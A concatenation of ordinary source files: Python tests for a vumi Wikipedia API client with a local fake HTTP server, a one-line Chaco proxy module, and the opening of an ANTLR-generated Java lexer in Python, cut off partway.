return u'\ufffd\ufffd%s\ufffd\ufffd' % (key,)
def make_extract(text, fullurl):
return ArticleExtract(text % SectionMarkerCreator(), fullurl)
class ArticleExtractTestCase(TestCase):
def assert_titles(self, ae, *titles):
self.assertEqual(list(titles), [s.title for s in ae.sections])
def assert_texts(self, ae, *texts):
self.assertEqual(list(texts), [s.text for s in ae.sections])
def assert_full_texts(self, ae, *texts):
self.assertEqual(list(texts), [s.full_text() for s in ae.sections])
def assert_section(self, section, title, text):
self.assertEqual(title, section.title)
self.assertEqual(text, section.text)
def assert_fullurl(self, ae, url):
self.assertEqual(ae.fullurl, url)
def test_fullurl(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract(u'foo\nbar', url)
self.assert_titles(ae, None)
self.assert_texts(ae, u'foo\nbar')
self.assert_fullurl(ae, url)
def test_one_section(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract(u'foo\nbar', url)
self.assert_titles(ae, None)
self.assert_texts(ae, u'foo\nbar')
def test_multiple_sections(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract(u'foo\n\n\n%(2)s bar \nbaz\n%(2)squux\n\n\nlol', url)
self.assert_titles(ae, None, u'bar', u'quux')
self.assert_texts(ae, u'foo', u'baz', u'lol')
def test_shallow_nested_sections(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract(u'%(2)sfoo\n%(3)s bar \ntext\n%(3)s baz\nblah', url)
self.assert_titles(ae, None, u'foo')
self.assert_texts(ae, u'', u'')
self.assert_full_texts(ae, u'', u'bar:\n\ntext\n\nbaz:\n\nblah')
[s20, s21] = ae.sections[1].get_subsections()
self.assert_section(s20, u'bar', u'text')
self.assert_section(s21, u'baz', u'blah')
def test_deep_nested_sections(self):
url = 'http://en.wikipedia.org/wiki/foo'
ae = make_extract('\n'.join([
u'%(2)ss1\nt1',
u'%(3)ss20\nt20',
u'%(3)ss21\nt21',
u'%(4)ss30\nt30',
u'%(4)ss31\nt31',
u'%(3)ss22\nt22',
]), url)
self.assert_titles(ae, None, u's1')
self.assert_texts(ae, u'', u't1')
self.assert_full_texts(ae, u'', '\n\n'.join([
u't1',
u's20:\n\nt20',
u's21:\n\nt21',
u's30:\n\nt30',
u's31:\n\nt31',
u's22:\n\nt22']))
[intro, s1] = ae.sections
[s20, s21, s22] = s1.get_subsections()
[s30, s31] = s21.get_subsections()
self.assertEqual([], intro.get_subsections())
self.assertEqual([], s20.get_subsections())
self.assertEqual([], s30.get_subsections())
self.assertEqual([], s31.get_subsections())
self.assertEqual([], s22.get_subsections())
self.assert_section(intro, None, u'')
self.assert_section(s1, u's1', u't1')
self.assert_section(s20, u's20', u't20')
self.assert_section(s21, u's21', u't21')
self.assert_section(s30, u's30', u't30')
self.assert_section(s31, u's31', u't31')
self.assert_section(s22, u's22', u't22')
def test_empty_input(self):
ae = ArticleExtract(u'', '')
self.assertEqual([u''], [s.text for s in ae.sections])
self.assertEqual([None], [s.title for s in ae.sections])
WIKIPEDIA_RESPONSES = json.load(
resource_stream(__name__, 'wikipedia_responses.json'))
def rewrite_request_line(request_line):
"""
Sort the request parameters in the URL path so tests don't rely on
deterministic dict ordering.
"""
method, sp, url_path = request_line.partition(' ')
path, q, params = url_path.partition('?')
params = '&'.join(sorted(params.split('&')))
url_path = q.join([path, params])
return sp.join([method, url_path])
class FakeHTTP(Protocol):
def dataReceived(self, data):
request_line, body = self.parse_request(data)
response = self.handle_request(request_line, body)
self.transport.write(response.encode('utf-8'))
self.transport.loseConnection()
def parse_request(self, data):
headers, _, body = data.partition('\r\n\r\n')
headers = headers.splitlines()
request_line = rewrite_request_line(headers.pop(0).rsplit(' ', 1)[0])
self.assert_user_agent(headers)
return request_line, body
def assert_user_agent(self, headers):
expected_user_agent = getattr(
self.factory.testcase, 'expected_user_agent', None)
if expected_user_agent is not None:
[user_agent] = [h.split(': ', 1)[1] for h in headers
if h.lower().startswith('user-agent')]
self.factory.testcase.assertEqual(expected_user_agent, user_agent)
def build_response(self, response_data):
lines = ["HTTP/1.1 %s" % (response_data['response_code'],)]
body = response_data['response_body']
if isinstance(body, dict):
body = json.dumps(body)
lines.extend(['', body])
return '\r\n'.join(lines)
def handle_request(self, request_line, body):
check_redirect = getattr(self.factory.testcase, 'check_redirect', None)
if check_redirect is not None:
verb, _, path = request_line.partition(" ")
if path.startswith("/REDIRECT/"):
request_line = "%s %s" % (verb, path[len("/REDIRECT"):])
# We assume check_redirect is a list.
check_redirect.append(request_line)
else:
return self.build_redirect_response(path)
response_data = self.factory.response_data.get(request_line)
if not response_data:
self.factory.testcase.fail(
"Unexpected request: %s" % (request_line,))
resp_body = response_data["request_body"]
if resp_body:
resp_body = json.dumps(resp_body)
self.factory.testcase.assertEqual(resp_body, body)
return self.build_response(response_data)
def build_redirect_response(self, path):
return "\r\n".join([
"HTTP/1.1 301 TLS Redirect",
"Location: /REDIRECT%s" % (path,),
"",
"",
])
class FakeHTTPTestCaseMixin(object):
def _reformat_response_data(self, response_data):
reformatted_response_data = {}
for request_line, stuff in response_data.iteritems():
request_line = rewrite_request_line(request_line)
reformatted_response_data[request_line] = stuff
return reformatted_response_data
def start_webserver(self, response_data):
factory = Factory()
factory.protocol = FakeHTTP
factory.response_data = self._reformat_response_data(response_data)
factory.testcase = self
webserver = reactor.listenTCP(0, factory, interface='127.0.0.1')
self.add_cleanup(webserver.loseConnection)
addr = webserver.getHost()
webserver.url = "http://%s:%s/" % (addr.host, addr.port)
return webserver
def debug_api_call(func):
@wraps(func)
def wrapped_test(self):
self.wikipedia.PRINT_DEBUG = True
self.wikipedia.url = self.wikipedia.URL
return func(self)
return wrapped_test
class WikipediaAPITestCase(VumiTestCase, FakeHTTPTestCaseMixin):
def setUp(self):
self.fake_api = self.start_webserver(WIKIPEDIA_RESPONSES)
self.wikipedia = WikipediaAPI(self.fake_api.url, False)
def assert_api_result(self, api_result_d, expected):
return api_result_d.addCallback(self.assertEqual, expected)
@inlineCallbacks
def test_search_success(self):
yield self.assert_api_result(
self.wikipedia.search('wikipedia', limit=3),
[u'Wikipedia', u'Wikip\xe9dia', u'Main Page'])
# And again with a different request and result limit
yield self.assert_api_result(
self.wikipedia.search('vumi', limit=2),
[u'Arambagh Utsab', u'Vulpia microstachys'])
@inlineCallbacks
def test_search_custom_backend(self):
yield self.assert_api_result(
self.wikipedia.search('wikipedia', limit=3,
backend='CirrusSearch'),
[u'Wikipedia', u'Wikip\xe9dia', u'English Wikipedia'])
def test_search_error(self):
return self.assertFailure(self.wikipedia.search('.'), APIError)
@inlineCallbacks
def test_bad_response(self):
yield self.assertFailure(self.wikipedia.search('notjson'), APIError)
self.flushLoggedErrors()
def test_search_no_results(self):
return self.assert_api_result(
self.wikipedia.search('ncdkiuagdqpowebjkcs'), [])
def test_get_extract(self):
def assert_extract(extract):
self.assertEqual(4, len(extract.sections))
return self.wikipedia.get_extract('Cthulhu').addCallback(
assert_extract)
@inlineCallbacks
def test_user_agent(self):
self.expected_user_agent = self.wikipedia.USER_AGENT
yield self.wikipedia.get_extract('Cthulhu')
self.wikipedia = WikipediaAPI(self.fake_api.url, False, 'Bob Howard')
self.expected_user_agent = 'Bob Howard'
yield self.wikipedia.get_extract('Cthulhu')
def test_api_timeout(self):
self.wikipedia = WikipediaAPI(self.fake_api.url, False, api_timeout=0)
return self.assertFailure(
self.wikipedia.get_extract('Cthulhu'), HttpTimeoutError)
@inlineCallbacks
def test_redirect(self):
"""
If we get a 301 response, we must correctly redirect.
"""
# The redirect magic here is ugly and hacky, but making it cleaner
# would require rewriting most of the fake HTTP stuff.
self.check_redirect = []
# Test with a search.
yield self.assert_api_result(
self.wikipedia.search('wikipedia', limit=3),
[u'Wikipedia', u'Wikip\xe9dia', u'Main Page'])
self.assertEqual(len(self.check_redirect), 1)
# Test with an article extract.
extract = yield self.wikipedia.get_extract('Cthulhu')
self.assertEqual(4, len(extract.sections))
self.assertEqual(len(self.check_redirect), 2)
|
praekelt/vumi-wikipedia
|
vumi_wikipedia/tests/test_wikipedia_api.py
|
Python
|
bsd-3-clause
| 11,063
|
# proxy module
from __future__ import absolute_import
from chaco.abstract_controller import *
|
enthought/etsproxy
|
enthought/chaco/abstract_controller.py
|
Python
|
bsd-3-clause
| 94
|
# $ANTLR 3.1 ./Java.g 2013-07-16 16:21:24
import sys
from antlr3 import *
from antlr3.compat import set, frozenset
# for convenience in actions
HIDDEN = BaseRecognizer.HIDDEN
# token types
T__159=159
T__158=158
T__160=160
LEFT_SHIFT_ASSIGN=65
T__167=167
T__168=168
EOF=-1
T__165=165
T__166=166
T__163=163
T__164=164
T__161=161
T__162=162
TYPE_IMPORT_ON_DEMAND_DECLARATION=7
T__148=148
T__147=147
T__149=149
ABSTRACT_METHOD_DECLARATION=28
COMPILATION_UNIT=4
MARKER_ANNOTATION=47
THIS=77
TYPE_PARAMETERS=12
T__154=154
ENUM_DECLARATION=15
T__155=155
T__156=156
T__157=157
T__150=150
QUALIFIED_SUPER=83
T__151=151
T__152=152
T__153=153
T__139=139
T__138=138
LESS_THAN_OR_EQUAL_TO=68
T__137=137
ELEMENT_VALUE_PAIR=48
T__136=136
INNER_THIS=90
IntegerTypeSuffix=102
ALTERNATE_CONSTRUCTOR_INVOCATION=42
TYPE_ARGUMENTS=37
NON_WILD_TYPE_ARGUMENTS=89
T__141=141
T__142=142
T__140=140
T__145=145
T__146=146
T__143=143
T__144=144
T__126=126
T__125=125
UNSIGNED_RIGHT_SHIFT_ASSIGN=66
T__128=128
T__127=127
SINGLE_TYPE_IMPORT_DECLARATION=6
WS=111
T__129=129
UNQUALIFIED_SUPER=78
POST_INCREMENT_EXPRESSION=74
ANNOTATION_TYPE_BODY=51
FloatingPointLiteral=96
ANNOTATION_METHOD=52
NORMAL_ANNOTATION=45
JavaIDDigit=110
PREFIX_EXPRESSION=73
LEFT_SHIFT=70
CALL=81
EXPRESSION_STATEMENT=57
METHOD_DECLARATION=27
T__130=130
T__131=131
T__132=132
CLASS_DESIGNATOR=79
T__133=133
T__134=134
T__135=135
T__118=118
T__119=119
T__116=116
ANNOTATION_INTERFACE=50
T__117=117
ENHANCED_FOR_CONTROL=62
T__114=114
STATIC_IMPORT_ON_DEMAND_DECLARATION=9
T__115=115
T__124=124
T__123=123
T__122=122
T__121=121
T__120=120
HexDigit=101
QUALIFIED_THIS=82
T__202=202
EXPLICIT_GENERIC_INVOCATIONS=88
EXPRESSION_LIST=64
CONSTRUCTOR_DECLARATION=29
HexLiteral=93
CONSTRUCTOR_BODY=34
CLASS_BODY=21
StringLiteral=98
CLASS_DECLARATION=11
ENUM=108
UNSIGNED_RIGHT_SHIFT=71
BLOCK=53
OctalEscape=107
ARRAY_INITIALIZER=33
CAST=76
LOCAL_VARIABLE_DECLARATION=54
FloatTypeSuffix=104
FOR_INIT_DECLARATION=60
OctalLiteral=94
SIGNED_RIGHT_SHIFT=72
Identifier=100
UNQUALIFIED_CLASS_INSTANCE_CREATION=84
FOR_UPDATE=63
UNQUALIFIED_SUPERCLASS_CONSTRUCTOR_INVOCATION=43
NEW_ARRAY=87
ENUM_BODY=16
INSTANCE_INITIALIZER=24
FORMAL_PARAMETER=40
VOID=25
COMMENT=112
SELECT=36
ENUM_CONSTANT=18
SINGLE_ELEMENT_ANNOTATION=46
ARGUMENTS=91
LINE_COMMENT=113
ASSERT_STATEMENT=55
ARRAY_OF=32
ASSERT=99
LAST_FORMAL_PARAMETER=41
TYPE_BOUND=14
BASIC_FOR_CONTROL=59
SWITCH_BLOCK_STATEMENT_GROUP=58
ELEMENT_VALUE_ARRAY_INITIALIZER=49
T__200=200
T__201=201
METHOD_BODY=92
EMPTY_STATEMENT=56
INSTANTIATION=35
POST_DECREMENT_EXPRESSION=75
SINGLE_STATIC_IMPORT_DECLARATION=8
INTERFACE_DECLARATION=20
Letter=109
EscapeSequence=105
FIELD_DECLARATION=26
GREATER_THAN_OR_EQUAL_TO=69
CharacterLiteral=97
Exponent=103
MODIFIERS=10
VARIABLE_DECLARATOR=30
T__199=199
T__198=198
T__197=197
ENUM_CONSTANTS=17
T__196=196
T__195=195
FOR_INIT_EXPRESSION_LIST=61
T__194=194
ENUM_BODY_DECLARATIONS=19
T__193=193
T__192=192
T__191=191
T__190=190
WILDCARD=38
NEW_INITIALIZED_ARRAY=86
T__184=184
T__183=183
T__186=186
T__185=185
T__188=188
T__187=187
PACKAGE_DECLARATION=5
T__189=189
CONSTANT_DECLARATION=31
INTERFACE_BODY=22
T__180=180
T__182=182
T__181=181
SIGNED_RIGHT_SHIFT_ASSIGN=67
ARRAY_ACCESS=80
DecimalLiteral=95
T__175=175
T__174=174
T__173=173
FORMAL_PARAMETERS=39
T__172=172
TYPE_PARAMETER=13
T__179=179
T__178=178
T__177=177
T__176=176
QUALIFIED_SUPERCLASS_CONSTRUCTOR_INVOCATION=44
UnicodeEscape=106
T__171=171
T__170=170
QUALIFIED_CLASS_INSTANCE_CREATION=85
STATIC_INITIALIZER=23
T__169=169
class JavaLexer(Lexer):
grammarFileName = "./Java.g"
antlr_version = version_str_to_tuple("3.1")
antlr_version_str = "3.1"
def __init__(self, input=None, state=None):
if state is None:
state = RecognizerSharedState()
Lexer.__init__(self, input, state)
self.dfa18 = self.DFA18(
self, 18,
eot = self.DFA18_eot,
eof = self.DFA18_eof,
min = self.DFA18_min,
max = self.DFA18_max,
accept = self.DFA18_accept,
special = self.DFA18_special,
transition = self.DFA18_transition
)
self.dfa29 = self.DFA29(
self, 29,
eot = self.DFA29_eot,
eof = self.DFA29_eof,
min = self.DFA29_min,
max = self.DFA29_max,
accept = self.DFA29_accept,
special = self.DFA29_special,
transition = self.DFA29_transition
)
self.enumIsKeyword = False;
self.assertIsKeyword = True;
# $ANTLR start "T__114"
def mT__114(self, ):
try:
_type = T__114
_channel = DEFAULT_CHANNEL
# ./Java.g:12:8: ( 'package' )
# ./Java.g:12:10: 'package'
pass
self.match("package")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__114"
# $ANTLR start "T__115"
def mT__115(self, ):
try:
_type = T__115
_channel = DEFAULT_CHANNEL
# ./Java.g:13:8: ( ';' )
# ./Java.g:13:10: ';'
pass
self.match(59)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__115"
# $ANTLR start "T__116"
def mT__116(self, ):
try:
_type = T__116
_channel = DEFAULT_CHANNEL
# ./Java.g:14:8: ( 'import' )
# ./Java.g:14:10: 'import'
pass
self.match("import")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__116"
# $ANTLR start "T__117"
def mT__117(self, ):
try:
_type = T__117
_channel = DEFAULT_CHANNEL
# ./Java.g:15:8: ( 'static' )
# ./Java.g:15:10: 'static'
pass
self.match("static")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__117"
# $ANTLR start "T__118"
def mT__118(self, ):
try:
_type = T__118
_channel = DEFAULT_CHANNEL
# ./Java.g:16:8: ( '.' )
# ./Java.g:16:10: '.'
pass
self.match(46)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__118"
# $ANTLR start "T__119"
def mT__119(self, ):
try:
_type = T__119
_channel = DEFAULT_CHANNEL
# ./Java.g:17:8: ( '*' )
# ./Java.g:17:10: '*'
pass
self.match(42)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__119"
# $ANTLR start "T__120"
def mT__120(self, ):
try:
_type = T__120
_channel = DEFAULT_CHANNEL
# ./Java.g:18:8: ( 'class' )
# ./Java.g:18:10: 'class'
pass
self.match("class")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__120"
# $ANTLR start "T__121"
def mT__121(self, ):
try:
_type = T__121
_channel = DEFAULT_CHANNEL
# ./Java.g:19:8: ( 'extends' )
# ./Java.g:19:10: 'extends'
pass
self.match("extends")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__121"
# $ANTLR start "T__122"
def mT__122(self, ):
try:
_type = T__122
_channel = DEFAULT_CHANNEL
# ./Java.g:20:8: ( 'implements' )
# ./Java.g:20:10: 'implements'
pass
self.match("implements")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__122"
# $ANTLR start "T__123"
def mT__123(self, ):
try:
_type = T__123
_channel = DEFAULT_CHANNEL
# ./Java.g:21:8: ( '<' )
# ./Java.g:21:10: '<'
pass
self.match(60)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__123"
# $ANTLR start "T__124"
def mT__124(self, ):
try:
_type = T__124
_channel = DEFAULT_CHANNEL
# ./Java.g:22:8: ( ',' )
# ./Java.g:22:10: ','
pass
self.match(44)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__124"
# $ANTLR start "T__125"
def mT__125(self, ):
try:
_type = T__125
_channel = DEFAULT_CHANNEL
# ./Java.g:23:8: ( '>' )
# ./Java.g:23:10: '>'
pass
self.match(62)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__125"
# $ANTLR start "T__126"
def mT__126(self, ):
try:
_type = T__126
_channel = DEFAULT_CHANNEL
# ./Java.g:24:8: ( '&' )
# ./Java.g:24:10: '&'
pass
self.match(38)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__126"
# $ANTLR start "T__127"
def mT__127(self, ):
try:
_type = T__127
_channel = DEFAULT_CHANNEL
# ./Java.g:25:8: ( '{' )
# ./Java.g:25:10: '{'
pass
self.match(123)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__127"
# $ANTLR start "T__128"
def mT__128(self, ):
try:
_type = T__128
_channel = DEFAULT_CHANNEL
# ./Java.g:26:8: ( '}' )
# ./Java.g:26:10: '}'
pass
self.match(125)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__128"
# $ANTLR start "T__129"
def mT__129(self, ):
try:
_type = T__129
_channel = DEFAULT_CHANNEL
# ./Java.g:27:8: ( 'interface' )
# ./Java.g:27:10: 'interface'
pass
self.match("interface")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__129"
# $ANTLR start "T__130"
def mT__130(self, ):
try:
_type = T__130
_channel = DEFAULT_CHANNEL
# ./Java.g:28:8: ( 'void' )
# ./Java.g:28:10: 'void'
pass
self.match("void")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__130"
# $ANTLR start "T__131"
def mT__131(self, ):
try:
_type = T__131
_channel = DEFAULT_CHANNEL
# ./Java.g:29:8: ( '[' )
# ./Java.g:29:10: '['
pass
self.match(91)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__131"
# $ANTLR start "T__132"
def mT__132(self, ):
try:
_type = T__132
_channel = DEFAULT_CHANNEL
# ./Java.g:30:8: ( ']' )
# ./Java.g:30:10: ']'
pass
self.match(93)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__132"
# $ANTLR start "T__133"
def mT__133(self, ):
try:
_type = T__133
_channel = DEFAULT_CHANNEL
# ./Java.g:31:8: ( 'throws' )
# ./Java.g:31:10: 'throws'
pass
self.match("throws")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__133"
# $ANTLR start "T__134"
def mT__134(self, ):
try:
_type = T__134
_channel = DEFAULT_CHANNEL
# ./Java.g:32:8: ( '=' )
# ./Java.g:32:10: '='
pass
self.match(61)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__134"
# $ANTLR start "T__135"
def mT__135(self, ):
try:
_type = T__135
_channel = DEFAULT_CHANNEL
# ./Java.g:33:8: ( 'boolean' )
# ./Java.g:33:10: 'boolean'
pass
self.match("boolean")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__135"
# $ANTLR start "T__136"
def mT__136(self, ):
try:
_type = T__136
_channel = DEFAULT_CHANNEL
# ./Java.g:34:8: ( 'char' )
# ./Java.g:34:10: 'char'
pass
self.match("char")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__136"
# $ANTLR start "T__137"
def mT__137(self, ):
try:
_type = T__137
_channel = DEFAULT_CHANNEL
# ./Java.g:35:8: ( 'byte' )
# ./Java.g:35:10: 'byte'
pass
self.match("byte")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__137"
# $ANTLR start "T__138"
def mT__138(self, ):
try:
_type = T__138
_channel = DEFAULT_CHANNEL
# ./Java.g:36:8: ( 'short' )
# ./Java.g:36:10: 'short'
pass
self.match("short")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__138"
# $ANTLR start "T__139"
def mT__139(self, ):
try:
_type = T__139
_channel = DEFAULT_CHANNEL
# ./Java.g:37:8: ( 'int' )
# ./Java.g:37:10: 'int'
pass
self.match("int")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__139"
# $ANTLR start "T__140"
def mT__140(self, ):
try:
_type = T__140
_channel = DEFAULT_CHANNEL
# ./Java.g:38:8: ( 'long' )
# ./Java.g:38:10: 'long'
pass
self.match("long")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__140"
# $ANTLR start "T__141"
def mT__141(self, ):
try:
_type = T__141
_channel = DEFAULT_CHANNEL
# ./Java.g:39:8: ( 'float' )
# ./Java.g:39:10: 'float'
pass
self.match("float")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__141"
# $ANTLR start "T__142"
def mT__142(self, ):
try:
_type = T__142
_channel = DEFAULT_CHANNEL
# ./Java.g:40:8: ( 'double' )
# ./Java.g:40:10: 'double'
pass
self.match("double")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__142"
# $ANTLR start "T__143"
def mT__143(self, ):
try:
_type = T__143
_channel = DEFAULT_CHANNEL
# ./Java.g:41:8: ( '?' )
# ./Java.g:41:10: '?'
pass
self.match(63)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__143"
# $ANTLR start "T__144"
def mT__144(self, ):
try:
_type = T__144
_channel = DEFAULT_CHANNEL
# ./Java.g:42:8: ( 'super' )
# ./Java.g:42:10: 'super'
pass
self.match("super")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__144"
# $ANTLR start "T__145"
def mT__145(self, ):
try:
_type = T__145
_channel = DEFAULT_CHANNEL
# ./Java.g:43:8: ( '(' )
# ./Java.g:43:10: '('
pass
self.match(40)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__145"
# $ANTLR start "T__146"
def mT__146(self, ):
try:
_type = T__146
_channel = DEFAULT_CHANNEL
# ./Java.g:44:8: ( ')' )
# ./Java.g:44:10: ')'
pass
self.match(41)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__146"
# $ANTLR start "T__147"
def mT__147(self, ):
try:
_type = T__147
_channel = DEFAULT_CHANNEL
# ./Java.g:45:8: ( '...' )
# ./Java.g:45:10: '...'
pass
self.match("...")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__147"
# $ANTLR start "T__148"
def mT__148(self, ):
try:
_type = T__148
_channel = DEFAULT_CHANNEL
# ./Java.g:46:8: ( 'this' )
# ./Java.g:46:10: 'this'
pass
self.match("this")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__148"
# $ANTLR start "T__149"
def mT__149(self, ):
try:
_type = T__149
_channel = DEFAULT_CHANNEL
# ./Java.g:47:8: ( 'true' )
# ./Java.g:47:10: 'true'
pass
self.match("true")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__149"
# $ANTLR start "T__150"
def mT__150(self, ):
try:
_type = T__150
_channel = DEFAULT_CHANNEL
# ./Java.g:48:8: ( 'false' )
# ./Java.g:48:10: 'false'
pass
self.match("false")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__150"
# $ANTLR start "T__151"
def mT__151(self, ):
try:
_type = T__151
_channel = DEFAULT_CHANNEL
# ./Java.g:49:8: ( 'null' )
# ./Java.g:49:10: 'null'
pass
self.match("null")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__151"
# $ANTLR start "T__152"
def mT__152(self, ):
try:
_type = T__152
_channel = DEFAULT_CHANNEL
# ./Java.g:50:8: ( '@' )
# ./Java.g:50:10: '@'
pass
self.match(64)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__152"
# $ANTLR start "T__153"
def mT__153(self, ):
try:
_type = T__153
_channel = DEFAULT_CHANNEL
# ./Java.g:51:8: ( 'default' )
# ./Java.g:51:10: 'default'
pass
self.match("default")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__153"
# $ANTLR start "T__154"
def mT__154(self, ):
try:
_type = T__154
_channel = DEFAULT_CHANNEL
# ./Java.g:52:8: ( ':' )
# ./Java.g:52:10: ':'
pass
self.match(58)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__154"
# $ANTLR start "T__155"
def mT__155(self, ):
try:
_type = T__155
_channel = DEFAULT_CHANNEL
# ./Java.g:53:8: ( 'if' )
# ./Java.g:53:10: 'if'
pass
self.match("if")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__155"
# $ANTLR start "T__156"
def mT__156(self, ):
try:
_type = T__156
_channel = DEFAULT_CHANNEL
# ./Java.g:54:8: ( 'else' )
# ./Java.g:54:10: 'else'
pass
self.match("else")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__156"
# $ANTLR start "T__157"
def mT__157(self, ):
try:
_type = T__157
_channel = DEFAULT_CHANNEL
# ./Java.g:55:8: ( 'for' )
# ./Java.g:55:10: 'for'
pass
self.match("for")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__157"
# $ANTLR start "T__158"
def mT__158(self, ):
try:
_type = T__158
_channel = DEFAULT_CHANNEL
# ./Java.g:56:8: ( 'while' )
# ./Java.g:56:10: 'while'
pass
self.match("while")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__158"
# $ANTLR start "T__159"
def mT__159(self, ):
try:
_type = T__159
_channel = DEFAULT_CHANNEL
# ./Java.g:57:8: ( 'do' )
# ./Java.g:57:10: 'do'
pass
self.match("do")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__159"
# $ANTLR start "T__160"
def mT__160(self, ):
try:
_type = T__160
_channel = DEFAULT_CHANNEL
# ./Java.g:58:8: ( 'try' )
# ./Java.g:58:10: 'try'
pass
self.match("try")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__160"
# $ANTLR start "T__161"
def mT__161(self, ):
try:
_type = T__161
_channel = DEFAULT_CHANNEL
# ./Java.g:59:8: ( 'catch' )
# ./Java.g:59:10: 'catch'
pass
self.match("catch")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__161"
# $ANTLR start "T__162"
def mT__162(self, ):
try:
_type = T__162
_channel = DEFAULT_CHANNEL
# ./Java.g:60:8: ( 'finally' )
# ./Java.g:60:10: 'finally'
pass
self.match("finally")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__162"
# $ANTLR start "T__163"
def mT__163(self, ):
try:
_type = T__163
_channel = DEFAULT_CHANNEL
# ./Java.g:61:8: ( 'switch' )
# ./Java.g:61:10: 'switch'
pass
self.match("switch")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__163"
# $ANTLR start "T__164"
def mT__164(self, ):
try:
_type = T__164
_channel = DEFAULT_CHANNEL
# ./Java.g:62:8: ( 'synchronized' )
# ./Java.g:62:10: 'synchronized'
pass
self.match("synchronized")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__164"
# $ANTLR start "T__165"
def mT__165(self, ):
try:
_type = T__165
_channel = DEFAULT_CHANNEL
# ./Java.g:63:8: ( 'return' )
# ./Java.g:63:10: 'return'
pass
self.match("return")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__165"
# $ANTLR start "T__166"
def mT__166(self, ):
try:
_type = T__166
_channel = DEFAULT_CHANNEL
# ./Java.g:64:8: ( 'throw' )
# ./Java.g:64:10: 'throw'
pass
self.match("throw")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__166"
# $ANTLR start "T__167"
def mT__167(self, ):
try:
_type = T__167
_channel = DEFAULT_CHANNEL
# ./Java.g:65:8: ( 'break' )
# ./Java.g:65:10: 'break'
pass
self.match("break")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__167"
# $ANTLR start "T__168"
def mT__168(self, ):
try:
_type = T__168
_channel = DEFAULT_CHANNEL
# ./Java.g:66:8: ( 'continue' )
# ./Java.g:66:10: 'continue'
pass
self.match("continue")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__168"
# $ANTLR start "T__169"
def mT__169(self, ):
try:
_type = T__169
_channel = DEFAULT_CHANNEL
# ./Java.g:67:8: ( 'case' )
# ./Java.g:67:10: 'case'
pass
self.match("case")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__169"
# $ANTLR start "T__170"
def mT__170(self, ):
try:
_type = T__170
_channel = DEFAULT_CHANNEL
# ./Java.g:68:8: ( '+=' )
# ./Java.g:68:10: '+='
pass
self.match("+=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__170"
# $ANTLR start "T__171"
